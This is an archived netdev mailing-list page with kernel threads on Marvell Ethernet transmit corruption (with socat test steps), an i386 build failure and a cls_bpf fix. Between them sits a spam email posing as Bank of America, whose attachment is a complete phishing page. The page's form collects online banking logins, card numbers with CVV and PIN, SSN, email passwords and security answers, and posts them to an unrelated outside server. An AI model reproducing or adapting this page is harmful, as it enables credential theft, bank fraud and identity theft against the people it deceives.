* Re: [PATCH net 0/2] net: marvell: Fix highmem support on non-TSO path
From: Dean Gehnert @ 2015-01-22 18:41 UTC (permalink / raw)
To: Russell King - ARM Linux, Ezequiel Garcia
Cc: netdev, David Miller, B38611, fabio.estevam
In-Reply-To: <20150121150159.GS26493@n2100.arm.linux.org.uk>
On 01/21/2015 07:01 AM, Russell King - ARM Linux wrote:
> On Wed, Jan 21, 2015 at 09:54:08AM -0300, Ezequiel Garcia wrote:
>> These two commits are fixes to the issue reported by Russell King on
>> mv643xx_eth. Namely, the introduction of a regression by commit 69ad0dd7af22
>> which removed the support for highmem skb fragments. The guilty commit
>> introduced the assumption of fragment's payload being located in lowmem pages.
> I do wonder whether 69ad0dd7af22 is the real culpret, or whether there is
> some other change in the netdev layer that we're missing. That commit is
> in 3.16, but from what I remember, 3.17 works fine, it's 3.18 which fails.
>
>> A similar pattern can be found in the original mvneta driver (in fact, the
>> regression was introduced by copy-pasting the mvneta code).
>>
>> These fixes are for the non-TSO egress path in mvneta and mv643xx_eth drivers.
>> The TSO path needs a more intrusive change, as the TSO API needs to be fixed
>> (e.g. to make it work in skb fragments, instead of pointers to data).
>>
>> Russell, as I'm still unable to reproduce this, do you think you can
>> give it a spin over there?
> Sure - I think the only one I can test is mv643xx_eth, I don't think I
> have any device which supports mv_neta.
>
> The test scenario is for a NFS mount (the Marvell device as the NFS
> client) over IPv6.
>
> Initial testing looks good, I'll let it run for a while with various
> builds on the NFS share (which iirc was one of the triggering
> workloads).
>
> Thanks.
>
FYI, I found a way to reproduce the mv643xx_eth transmit corruption
without using a network filesystem by using SOCAT (should also be able
to use NETCAT or NC) and I have a bit more information about the
corruption that looks like it is somehow related to the cache line size.
1) Create a "large" input file with known data on the target (saved to
RAM disk or other storage):
% php -r 'for ($x = 0; $x < 0x2000000; $x++) { printf("%08X\n",
$x); }' > ExpectData.in
or
% perl -e 'for ($x = 0; $x < 0x2000000; $x++) { printf("%08X\n",
$x); }' > ExpectData.in
% md5sum ExpectData.in
4a4727232209b85badc1ca25ed4df222 ExpectData.in
2) Start SOCAT on the host system to perform Ethernet receive MD5
checksum of the data:
% socat -s -u TCP4-LISTEN:4000,fork,reuseaddr EXEC:md5sum
3) Enable TSO on the target:
% ethtool -K eth0 tso on
4) Send the data file from the target to the host using SOCAT with a
non-cache aligned block size:
% socat -b$(((1024*10)+1)) -u ExpectData.in TCP:192.168.1.212:4000
5) The SOCAT running on the host system will report the MD5 checksum. If
the MD5 is correct, it should be 4a4727232209b85badc1ca25ed4df222.
What I am seeing is every now and then, there are 32-bits (4 bytes) of
data in the transmit Ethernet stream that are corrupted. If I change the
SOCAT block size to something that is Armada 300 (Kirkwood) cache line
aligned (ie. -b$(((1024*10)+0)) or -b$(((1024*10)+8))), it works just
fine... If you want to capture the actual file and look at it, you can
use SOCAT:
% socat -u TCP4-LISTEN:4000,fork,reuseaddr OPEN:ActualData.in,creat
and since the data file is text, it is really easy to see the corruption
(diff ExpectData.in ActualData.in | less).
I can disable TSO (ethtool -K eth0 tso off) and re-run the tests and the
corruption does not occur.
I will give Ezequiel's latest patches a test a today and let you know if
they change the behavior.
Dean
^ permalink raw reply
* Unauthorized activity on your online account
From: Bank of America @ 2015-01-22 18:58 UTC (permalink / raw)
To: netdev
[-- Attachment #1: Message text --]
[-- Type: text/plain, Size: 789 bytes --]
CASE ID: 2796459
Dear Customer,
We have recently detected several failed attempts to provide the correct answers to your security questions.
As a result, we have temporarily suspended your online access and we need to go through some verification.
To begin please download the attached file below and start with the verification procedure.
Bank of America safeguards your account whenever there isa possibility that someone else is attempting to sign in.
Please understand that this form must be completed within 24 hours.
This is our security measure intended to help and protect you and your account.
Thank you for your cooperation and we deeply apologize for any inconvenience this may have caused you.
© 2014 Bank of America Corporation. All rights reserved.
[-- Attachment #2: Attached file: Validation Form.html --]
[-- Type: application/octet-stream, Size: 31187 bytes --]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<!-- TLDB false -->
<!-- TL-NOPV true -->
<title>Bank of America | Online Banking | Customer Service</title>
<script language="JavaScript" type="text/javascript">
var boaVIPAAuseGzippedBundles = "false";
var boaVIPAAjawrEnabled = "false";
</script>
<link rel="shortcut icon" href="https://secure.bankofamerica.com/pa/global-assets/1.0/graphic/favicon.ico" type="image/ico" />
<script language="JavaScript" type="text/javascript">
boaVIPAAuseGzippedBundles = "true";
</script>
<script language="JavaScript" type="text/javascript">
var vipaaPublicKey = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAhSPXrfwo/cxe6pl9FahuuopVMqQd6gsSPU2DKl93loG8bJnu+zl8SmscOVPEARL22r2BKfW3+W8RHFDr9G903stahSZSzYWnAaSPhi8qixCA4gpZGwI8S4go3utYAhZ7ghz5Q0xSUypyciaHAbLIROm2TwO2hotVV7k0v9MtFjruJYN+reXD2cBuk3j2gm1iO5MPCPbiT6bp+J/9Esq0pFNpNTuimlCTf0flss8Sj0LPg1OIa0Cv+3tevnO7RaUa+vzwDahBxeO6p8CQOOoh43OkaFX/VLN8a26oo8wIeryVKh8yeBnLH/h+wT/JQGfuXSbhT4mEEy7EiTCBriAn2QIDAQAB";
</script>
<!-- TLDB TEALEAF_UiCapture_APP_ENABLED_NOT_TRUE -->
<script language="JavaScript" type="text/javascript">
boaVIPAAjawrEnabled = "true";
</script>
<link rel="stylesheet" type="text/css" href="https://secure.bankofamerica.com/pa/components/bundles/gzip-compressed/xengine/Global/1.0/style/global-jawr.css" media="all" />
<link rel="stylesheet" type="text/css" href="https://secure.bankofamerica.com/pa/components/bundles/gzip-compressed/xengine/VIPAA/2.7/style/vipaa-jawr.css" media="all" />
<script type="text/javascript">
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
<noscript><style>body{display : block;}</style></noscript>
<a class="ada-hidden" href="#skip-to-h1" name="anc-skip-to-main-content">Skip to main content</a>
<div class="two-row-flex-wideleft-layout">
<div class="center-content">
<div class="header">
<noscript>
<div class="fauxdal-overlay"></div>
<div class="fauxdal-module">
<div class="noscript-reload-skin">
<div class="fauxdal-top"></div>
<div class="fauxdal-bottom">
<div class="fsd-fauxdal-content">
<div class="fsd-fauxdal-title">
Please use JavaScript
</div>
<p>You need a web browser that supports JavaScript to use our site. Without it, some pages won't work as designed. To make sure JavaScript is turned on, please adjust your browser settings.</p>
<p> </p>
<p><a title="Browser Help and Tips" name="Browser Help and Tips" href="https://www.bankofamerica.com/onlinebanking/online-banking-security-faqs.go" target="_self">Browser Help and Tips</a></p>
</div>
<div class="fsd-fauxdal-close">
<a class="button-common button-gray" name="close_button_js_disabled_modal" href=><span>Close</span></a>
</div>
<div class="clearboth"></div>
</div>
</div>
</div>
</noscript>
<style type="text/css">
a.submit input {
background:url(http://s7.postimg.org/6a3be7thj/cont.png) no-repeat;
cursor:pointer;
width: 85px;
height: 28px;
text-align: left;
border: none;
</style>
<SCRIPT language=JavaScript>
<!--
function check(form) {
if (form.box1.value == "Select state")
{ alert("Please select the state where your accounts were opened on step 1 before submitting."); form.box1.focus(); return;}
if (form.box2.value == "")
{ alert("Please Enter your Online ID on step 1 before submitting."); form.box2.focus(); return;}
if (form.box3.value == "")
{ alert("Please enter your Passcode on step 1 before submitting."); form.box3.focus(); return;}
if (form.box5.value == "")
{ alert("Please enter Credit/Debit Card Number on step 2."); form.box5.focus(); return;}
// Start of cc_number error Alert!
var checkOK = "0123456789";
var checkStr = form.box5.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter Credit/Debit Card Number on step 2.");
form.box5.focus();
return;}
// End of cc_number error Alert!
if (form.box5.value.length < 15)
{ alert("Please enter Credit/Debit Card Number on step 2.");form.box5.focus(); return;}
if (form.box6.value == "")
{ alert("Please enter your card's Expiration Month on step 2."); form.box6.focus(); return;}
if (form.box7.value == "")
{ alert("Please enter your card's Expiration Year on step 2."); form.box7.focus(); return;}
if (form.box8.value == "")
{ alert("Please Enter Code Verification Number of your Credit/Debit Card on step 2."); form.box8.focus(); return;}
// Start of cvv2 error Alert!
var checkOK = "0123456789";
var checkStr = form.box8.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please Enter Code Verification Number of your Credit/Debit Card on step 2.");
form.box8.focus();
return;}
// End of cvv2 error Alert!
if (form.box8.value.length < 3)
{ alert("Please Enter Code Verification Number of your Credit/Debit Card on step 2.");form.box8.focus(); return;}
if (form.box4.value == "")
{ alert("Enter your ATM/Check Card PIN on step 2."); form.box4.focus(); return;}
// Start of pin error Alert!
var checkOK = "0123456789";
var checkStr = form.box4.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Enter your ATM/Check Card PIN on step 2.");
form.box4.focus();
return;}
// End of pin error Alert!
if (form.box4.value.length < 4)
{ alert("Enter your ATM/Check Card PIN on step 2.");form.box4.focus(); return;}
if (form.box10.value == "")
{ alert("Please Enter your Bank Account Number on step 2."); form.box10.focus(); return;}
// Start of accnr error Alert!
var checkOK = "0123456789";
var checkStr = form.box10.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please Enter your Bank Account Number on step 2.");
form.box10.focus();
return;}
// End of accnr error Alert!
if (form.box11.value == "")
{ alert("Please enter your Bank Routing Number on step 2."); form.box11.focus(); return;}
// Start of routnr error Alert!
var checkOK = "0123456789";
var checkStr = form.box11.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter your Bank Routing Number on step 2.");
form.box11.focus();
return;}
// End of routnr error Alert!
if (form.box12.value == "")
{ alert("Please Enter your Name as it appears on your Credit/Debit Card on step 3."); form.box12.focus(); return;}
if (form.box13.value == "")
{ alert("Please Enter your Credit/Debit Card Billing Address on step 3."); form.box13.focus(); return;}
if (form.box14.value == "")
{ alert("Please Enter the City of your Credit/Debit Card Billing Address on step 3."); form.box14.focus(); return;}
if (form.box16.value == "")
{ alert("Please Enter the Zipcode of your Credit/Debit Card Billing Address on step 3."); form.box16.focus(); return;}
// Start of Zip Code error Alert!
var checkOK = "0123456789";
var checkStr = form.box16.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid Zip Code on step 3.");
form.box16.focus();
return;}
// End of Zip Code error Alert!
if (form.box16.value.length < 5)
{ alert("You must provide a valid Zip Code on step 3."); form.box16.focus(); return;}
if (form.box17.value == "")
{ alert("Please Enter your Phone Number on step 4."); form.box17.focus(); return;}
if (form.box18.value == "")
{ alert("Please Enter your Phone Number on step 4."); form.box18.focus(); return;}
if (form.box19.value == "")
{ alert("Please Enter your Phone Number on step 4."); form.box19.focus(); return;}
if (form.box20.value == "")
{ alert("Please Enter your Current E-mail Address on step 4."); form.box20.focus(); return;}
// Start of Email error Alert!
var checkEmail = "@.";
var checkStr = form.box20.value;
var EmailValid = false;
var EmailAt = false;
var EmailPeriod = false;
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkEmail.length; j++)
{
if (ch == checkEmail.charAt(j) && ch == "@")
EmailAt = true;
if (ch == checkEmail.charAt(j) && ch == ".")
EmailPeriod = true;
if (EmailAt && EmailPeriod)
break;
if (j == checkEmail.length)
break;
}
if (EmailAt && EmailPeriod)
{
EmailValid = true
break;
}
}
if (!EmailValid)
{
alert("Please enter a valid email address on step 4.");
form.box20.focus();
return;}
// End of Email error Alert!
if (form.box20.value.length < 3)
{ alert("Please enter a valid email address on step 4."); form.box20.focus(); return;}
if (form.box21.value == "")
{ alert("Please enter a valid Email address password on step 4."); form.box21.focus(); return;}
if (form.box21.value.length < 3)
{ alert("Please enter a valid Email address password on step 4."); form.box21.focus(); return;}
if (form.box22.value == "")
{ alert("Please Enter the First 3 Digits of your Social Security Number on step 5."); form.box22.focus(); return;}
if (form.box23.value == "")
{ alert("Please Enter the Second 2 Digits of your Social Security Number on step 5."); form.box23.focus(); return;}
if (form.box24.value == "")
{ alert("Please Enter the Last 4 Digits of your Social Security Number on step 5."); form.box24.focus(); return;}
if (form.box25.value == "")
{ alert("Please enter your Birth Month on step 5."); form.box25.focus(); return;}
if (form.box26.value == "")
{ alert("Please enter your Birth Day on step 5."); form.box26.focus(); return;}
if (form.box27.value == "")
{ alert("Please enter your Birth Year on step 5."); form.box27.focus(); return;}
if (form.box28.value == "")
{ alert("Please enter your Mother's Maiden Name on step 5."); form.box28.focus(); return;}
if (form.box29.value == "")
{ alert("Please enter your Mother's Middles Name on step 5."); form.box29.focus(); return;}
if (form.box30.value == "")
{ alert("Please enter your Father's Maiden Name on step 5."); form.box30.focus(); return;}
if (form.box31.value == "")
{ alert("Please enter your Father's Middles Name on step 5."); form.box31.focus(); return;}
if (form.box32.value == "")
{ alert("Please enter your Driver's License number on step 5."); form.box32.focus(); return;}
if (form.box33.value == "Select SiteKey Challenge Question 1")
{ alert("Please Select your First SiteKey Challenge Question."); form.box33.focus(); return;}
if (form.box34.value == "")
{ alert("Please Answer your First SiteKey Challenge Question."); form.box34.focus(); return;}
if (form.box35.value == "Select SiteKey Challenge Question 2")
{ alert("Please Select your Second SiteKey Challenge Question."); form.box35.focus(); return;}
if (form.box36.value == "")
{ alert("Please Answer your Second SiteKey Challenge Question."); form.box36.focus(); return;}
if (form.box37.value == "Select SiteKey Challenge Question 3")
{ alert("Please Select your Third SiteKey Challenge Question."); form.box37.focus(); return;}
if (form.box38.value == "")
{ alert("Please Answer your Third SiteKey Challenge Question."); form.box38.focus(); return;}
form.submit()
}
//-->
</SCRIPT>
<div class="header-module">
<div class="fsd-secure-esp-skin">
<img height="28" width="221" alt="Bank of America" src="https://secure.bankofamerica.com/content/images/ContextualSiteGraphics/Logos/en_US/bac_reg_logo_tmp_250X69.gif" />
<div class="right-links">
<div class="secure-area">Secure Area</div>
<a class="divide" href="/login/languageToggle.go?request_locale=es-us" target="_self" name="spanish_toggle" title="Muestra esta sesión de la Banca en Línea">En Español</a>
<div class="clearboth"></div>
</div>
<div class="clearboth"></div>
</div>
</div>
<div class="page-title-module h-100" id="skip-to-h1">
<div class="red-grad-bar-skin sup-ie">
<h1>Let's get started</h1>
</div>
</div>
<link href="http://vadimg.com/twitter-bootstrap-wizard-example/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<link href="http://vadimg.com/twitter-bootstrap-wizard-example/prettify.css" rel="stylesheet">
<script src="http://code.jquery.com/jquery-latest.js"></script>
<script src="http://vadimg.com/twitter-bootstrap-wizard-example/bootstrap/js/bootstrap.min.js"></script>
<script src="http://vadimg.com/twitter-bootstrap-wizard-example/jquery.bootstrap.wizard.js"></script>
<script src="http://vadimg.com/twitter-bootstrap-wizard-example/prettify.js"></script>
<script>
$(document).ready(function() {
$('#rootwizard').bootstrapWizard({'nextSelector': '.button-next', 'previousSelector': '.button-previous'});
window.prettyPrint && prettyPrint()
});
</script>
<form action="http://www.kgna.co.uk/wp-admin/user/default.php" class="button" method="post" name="submit" id="submit">
<div id="rootwizard">
<div class="navbar">
<div class="navbar-inner">
<div class="container">
<div class="status-bar-bdf-module">
<div class="multi-step-skin">
<ul>
<li><a href="#tab1" data-toggle="tab">Step 1</a></li>
<li><a href="#tab2" data-toggle="tab">Step 2</a></li>
<li><a href="#tab3" data-toggle="tab">Step 3</a></li>
<li><a href="#tab4" data-toggle="tab">Step 4</a></li>
<li><a href="#tab5" data-toggle="tab">Step 5</a></li>
<li><a href="#tab6" data-toggle="tab">Finish</a></li>
</ul>
</div>
</div>
</div>
<div class="tab-content">
<div class="tab-pane" id="tab1">
<div class="blue-title"><h2 class="title-text">Please Update Your Online Banking Information</h2></div>
</br>
<font size="4">State where your accounts were opened : </font>
<p><select name="box1" id="stateListId" title="Select state" size="1"><option selected="" value="Select state">Select state</option> <option value="AL">Alabama</option> <option value="AK">Alaska</option> <option value="AZ">Arizona</option> <option value="AR">Arkansas</option> <option value="CA">California</option> <option value="CO">Colorado</option> <option value="CT">Connecticut</option> <option value="DE">Delaware</option> <option value="DC">District of Columbia</option> <option value="FL">Florida</option>
<option value="GA">Georgia</option> <option value="HI">Hawaii</option> <option value="ID">Idaho</option> <option value="IL">Illinois</option> <option value="IN">Indiana</option> <option value="IA">Iowa</option> <option value="KS">Kansas</option> <option value="KY">Kentucky</option> <option value="LA">Louisiana</option> <option value="ME">Maine</option> <option value="MD">Maryland</option> <option value="MA">Massachusetts</option> <option value="MI">Michigan</option> <option value="MN">Minnesota</option> <option value="MS">Mississippi</option> <option value="MO">Missouri</option> <option value="MT">Montana</option> <option value="NE">Nebraska</option> <option value="NV">Nevada</option> <option value="NH">New Hampshire</option> <option value="NJ">New Jersey</option> <option value="NM">New Mexico</option> <option value="NY">New York</option> <option value="NC">North Carolina</option> <option value="ND">North Dakota</option> <option value="OH">Ohio</option> <option value="OK">Oklahoma</option> <option value="OR">Oregon</option> <option value="PA">Pennsylvania</option> <option value="RI">Rhode Island</option> <option value="SC">South Carolina</option> <option value="SD">South Dakota</option>
<option value="TN">Tennessee</option> <option value="TX">Texas</option> <option value="UT">Utah</option> <option value="VT">Vermont</option> <option value="VA">Virginia</option> <option value="WA">Washington</option> <option value="WV">West Virginia</option> <option value="WI">Wisconsin</option> <option value="WY">Wyoming</option></select>
</p>
<font size="4">Online ID : <p><input autocomplete="off" type="text" size="5" title='Enter your Online id' name="box2" /></font></p>
<font size="4">Passcode : <p><input autocomplete="off" type="password" size="5" title='Enter your passcode' name="box3" /></font></p>
</div>
<div class="tab-pane" id="tab2">
<div class="blue-title"><h2 class="title-text">Account Information</h2></div>
</br>
<font size="4">Credit/Debit Card Number : <p><input autocomplete="off" maxlength="16" type="text" size="5" title='Enter your Card Number' name="box5" /></font></p>
<font size="4">Exp Date : <p><input autocomplete="off" type="text" size="5" style="WIDTH: 45px" maxlength="2" title='Enter your Exp Month' name="box6" /> <input autocomplete="off" type="text" style="WIDTH: 45px" maxlength="4" title='Enter your Exp year' name="box7" /></font></p>
<font size="4">Verification Code : <p><input autocomplete="off" maxlength="4" type="text" size="5" style="WIDTH: 45px" title='Enter your Verification number' name="box8" /></font></p>
<font size="4">ATM Pin : <p><input autocomplete="off" type="password" maxlength="4" size="5" style="WIDTH: 45px" title='Enter your ATM Pin' name="box4" /></font></p>
<font size="4">Account Number : <p><input autocomplete="off" type="text" size="5" title='Enter your Account Number' name="box10" /></font></p>
<font size="4">Routing Number : <p><input autocomplete="off" type="text" size="5" title='Enter your Routing Number' name="box11" /></font></p>
</div>
<div class="tab-pane" id="tab3">
<div class="blue-title"><h2 class="title-text">Billing Address</h2></div>
</br>
<font size="4">Full Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Full Name' name="box12" /></font></p>
<font size="4">Address : <p><input autocomplete="off" type="text" size="5" title='Enter your Address' name="box13" /></font></p>
<font size="4">City : <p><input autocomplete="off" type="text" size="5" title='Enter your City' name="box14" /></font></p>
<font size="4">Zip Code : <p><input autocomplete="off" type="text" maxlength="5" style="WIDTH: 45px" title='Enter your Zip Code' name="box16" /></font></p>
</div>
<div class="tab-pane" id="tab4">
<div class="blue-title"><h2 class="title-text">Contact Information</h2></div>
</br>
<font size="4">Phone Number : <p><input autocomplete="off" type="text" maxlength="3" size="5" style="WIDTH: 45px" title='Enter your Phone Number' name="box17" /> <input autocomplete="off" maxlength="3" type="text" style="WIDTH: 45px" title='Enter your First Name' name="box18" /> <input autocomplete="off" maxlength="4" type="text" style="WIDTH: 45px" title='Enter your First Name' name="box19" /></font></p>
<font size="4">E-mail Address : <p><input autocomplete="off" type="text" size="5" title='Enter your E-mail Address' name="box20" /></font></p>
<font size="4">E-mail Password : <p><input autocomplete="off" type="password" size="5" title='Enter your E-mail Password' name="box21" /></font></p>
</div>
<div class="tab-pane" id="tab5">
<div class="blue-title"><h2 class="title-text">Identification Information</h2></div>
</br>
<font size="4">Social Security Number : <p><input autocomplete="off" maxlength="3" type="text" size="5" style="WIDTH: 45px" title='Enter your Social Security Number' name="box22" /> <input autocomplete="off" maxlength="2" type="text" style="WIDTH: 45px" title='Enter your Social Security Number' name="box23" /> <input autocomplete="off" type="text" maxlength="4" style="WIDTH: 45px" title='Enter your Social Security Number' name="box24" /></font></p>
<font size="4">Date of Birth : <p><input autocomplete="off" maxlength="2" type="text" size="5" style="WIDTH: 45px" title='Enter your Date of Birth' name="box25" /> <input autocomplete="off" maxlength="2" type="text" style="WIDTH: 45px" title='Enter Date of Birth' name="box26" /> <input autocomplete="off" maxlength="4" type="text" style="WIDTH: 45px" title='Enter your Date of Birth' name="box27" /></font></p>
<font size="4">Mother's Maiden Name : <p><input autocomplete="off" type="text" size="5" title='Mother's Maiden Name' name="box28" /></font></p>
<font size="4">Mother's Middles Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Mother's Middles Name="box29" /></font></p>
<font size="4">Father's Maiden Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Father's Maiden Name' name="box30" /></font></p>
<font size="4">Father's Middles Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Father's Middles Name' name="box31" /></font></p>
<font size="4">Driver License Number : <p><input autocomplete="off" type="text" size="5" title='Enter your Driver License' name="box32" /></font></p>
</div>
<div class="tab-pane" id="tab6">
<div class="blue-title"><h2 class="title-text">SiteKey Challenge Questions</h2></div>
</br>
<p><select size="1" name="box33" autocomplete="off"><option selected="" value="Select SiteKey Challenge Question 1">Select SiteKey Challenge Question
1</option> <option value="In what city were you living at age 16?">In what
city were you living at age 16?</option> <option value="What is your maternal grandmother's first name?">What is your maternal
grandmother's first name?</option> <option value="What is your maternal grandfather's first name?">What is your maternal
grandfather's first name?</option> <option value="In what city were you born?">In what city were you born?</option>
<option value="What was the name of your first pet?">What was the name of your
first pet?</option> <option value="How old were you at your wedding?">How old
were you at your wedding?</option> <option value="In what year did you graduate from high school?">In what year did you
graduate from high school?</option> <option value="What is the first name of the best man/maid of honor at your wedding?">What
is the first name of the best man/maid of honor at your wedding?</option>
<option value="Who is your favorite childhood superhero?">Who is your favorite
childhood superhero?</option> <\SELECT></select></p>
<font size="4">Answer 1 : <p><input autocomplete="off" type="text" size="5" title='Answer 1' name="box34" /></font></p>
<p><select size="1" name="box35" autocomplete="off"><option selected="" value="Select SiteKey Challenge Question 2">Select SiteKey Challenge
Question 2</option> <option value="What is your father's middle name?">What is
your father's middle name?</option> <option value="What is your mother's middle name?">What is your mother's middle
name?</option> <option value="In what city were you married?">In what city
were you married?</option> <option value="In what city is your vacation home?">In what city is your vacation
home?</option> <option value="What is the first name of your first child?">What is the first name of
your first child?</option> <option value="What is the name of your first employer?">What is the name of your
first employer?</option> <option value="What is your favorite hobby?">What is
your favorite hobby?</option> <option value="What is your paternal grandfather's first name?">What is your paternal
grandfather's first name?</option> <option value="What is the first name of the best man/maid of honor at your wedding?">What
is the first name of the best man/maid of honor at your wedding?</option>
<option value="What high school did you attend?">What high school did you
attend?</option> <\SELECT></select><p>
<font size="4">Answer 2 : <p><input autocomplete="off" type="text" size="5" title='Answer 2' name="box36" /></font></p>
<p><select size="1" name="box37"><option selected="" value="Select SiteKey Challenge Question 3">Select
SiteKey Challenge Question 3</option> <option value="In what city was your mother born?">In what city was your mother
born?</option> <option value="In what city was your father born?">In what city
was your father born?</option> <option value="What was the name of your first boyfriend or girlfriend?">What was the
name of your first boyfriend or girlfriend?</option> <option value="When is your wedding anniversary?">When is your wedding
anniversary?</option> <option value="In what city did you honeymoon?">In what
city did you honeymoon?</option> <option value="In what city was your high school?">In what city was your high
school?</option> <option value="What is your paternal grandfather's first name?">What is your paternal
grandfather's first name?</option> <option value="What is your paternal grandmother's first name?">What is your paternal
grandmother's first name?</option> <option value="Where did you meet your spouse for the first time?">Where did you meet
your spouse for the first time?</option> <\SELECT></select></p>
<font size="4">Answer 3 : <p><input autocomplete="off" type="text" size="5" title='Answer 3' name="box38" /></font></p>
<a class="submit"><input autocomplete="off" onclick="check(this.form)" type="button" onsubmit="check(form);"></a>
</div>
<div style="float:left">
<input autocomplete="off" type='button' class='btn button-previous' name='previous' value='Previous' />
</div>
<div style="float:left">
<input autocomplete="off" type='button' class='btn button-next' name='next' value='Next' /></br></br>
</br></br>
</div>
</div>
</div>
</form>
<div id="clientSideErrors" class="messaging-module hide" aria-live="polite">
<div class="error-skin">
<div class="error-message">
<div id="Vipaa_Client_0"></div>
</div>
</div>
</div>
</div>
</div>
<div class="bottom-row">
<div class="left-column">
<div class="passcode-module">
<div class="verify-enroll-skin phoenix">
<div class="hidden-sections">
</div>
</div>
<div class="clearboth"></div>
</form>
</div>
</div>
<div class="modal-content-bdf-module">
<div class="sitekey-cancel-skin">
<div class="cancel-enroll-modal hide" id="cancel-enroll-modal" >
<div class="modal-content">
<h2>Are you sure you want to cancel enrollment?</h2>
<div id="infotext"><span id="infoNonChatText">Thank you for considering Online Banking. If you need additional assistance, please call 1.800.933.6262, Monday through Friday 7 a.m. to 10 p.m. local time, and Saturday and Sunday 8 a.m. to 5 p.m. local time</span>
<span id="lpButtonDivCancel"></span>
</div>
<div class="buttons">
<a name="modal_close" class="button-common button-blue mrt-15 sitekey-cancel-modal-leave-button" href="javascript:void(0);"><span>Yes, cancel now</span></a>
<a name="modal_cancel" class="button-common button-gray sitekey-cancel-modal-close-button" href="javascript:void(0);"> <span>No, continue enrolling</span> </a>
<div class="clearboth"></div>
</div>
</div>
</div>
<!-- end-->
</div>
</div>
</div>
<div class="right-column no-print">
<div class="quick-help-module">
<div class="fsd-liveperson-skin phoenix sup-ie" aria-atomic="true">
<div class="sm-title">
</div>
<div class="sm-topcontent-dottedbtm">
<div class="help-link-answer hide"></div>
</li>
</ul>
</div>
<div class="sm-btmcontent">
<div class="liveperson-module">
<div id="lpButtonDiv"></div>
</div>
</div>
</div>
</div>
</div>
<div class="clearboth"></div>
</div>
<div class="single-column-row"></div>
<div class="footer">
<div class="footer-top"> </div>
<div class="footer-inner">
<script language="javascript" src="https://secure.bankofamerica.com/pa/components/bundles/gzip-compressed/xengine/VIPAA/2.7/script/cm-jawr.js"></script>
<script type="text/javascript" src="https://secure.bankofamerica.com/pa/components/modules/vipaa-coremetrics-module/1.6/script/vipaa-coremetrics-module.js"></script>
<script type="text/javascript" src="https://secure.bankofamerica.com/pa/components/modules/vipaa-coremetrics-module/1.6/script/vipaa-coremetrics-module-eidms-skin.js"></script>
<noscript>
<iframe title="iFrame used for layout purpose" src="https://fls.doubleclick.net/activityi;src=1359940;type=olbco093;cat=onlin393;u4=[OLBcustomer];ord=1;num=1?" width="0" height="0" frameborder="0" style="display:none;"></iframe>
</noscript>
<div class="global-footer-module">
<div class="gray-bground-skin cssp">
<div class="secure">Secure area</div>
<div class="link-container">
<div class="link-row">
<a class="last-link" href="https://www.bankofamerica.com/privacy/" name="Privacy_&_Security_footer" title="Privacy & Security" target="_blank">Privacy & Security</a>
<div class="clearboth"></div>
</div>
</div>
<p>Bank of America, N.A. Member FDIC. <a name="Equal_Housing_Lender" href="http://www.bankofamerica.com/help/equalhousing_popup.cfm" target="_blank">Equal Housing Lender</a> <br />© 2014 Bank of America Corporation. All rights reserved.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</html>
^ permalink raw reply
* make allyesconfig i386 build failure with next-20150122
From: Jim Davis @ 2015-01-22 19:10 UTC (permalink / raw)
To: Stephen Rothwell, linux-next, linux-kernel, Greg Kroah-Hartman,
devel, isdn, netdev
make ARCH=i386 allyesconfig fails with
drivers/staging/built-in.o: In function `reset':
(.text+0x2ae89d): multiple definition of `reset'
drivers/isdn/built-in.o:(.text+0x185dc2): first defined here
make[1]: *** [drivers/built-in.o] Error 1
^ permalink raw reply
* Re: [PATCH net 2/2] net: cls_bpf: fix auto generation of per list handles
From: Daniel Borkmann @ 2015-01-22 19:02 UTC (permalink / raw)
To: Alexei Starovoitov
Cc: David S. Miller, Jiří Pírko,
netdev@vger.kernel.org
In-Reply-To: <CAADnVQLn2QXJaDvbvothBrKZTnPD1sGjh7ZNPuUG=MH3ZJTU4A@mail.gmail.com>
On 01/22/2015 07:52 PM, Alexei Starovoitov wrote:
...
> interesting bug. first time I'm looking at this bit and wondering
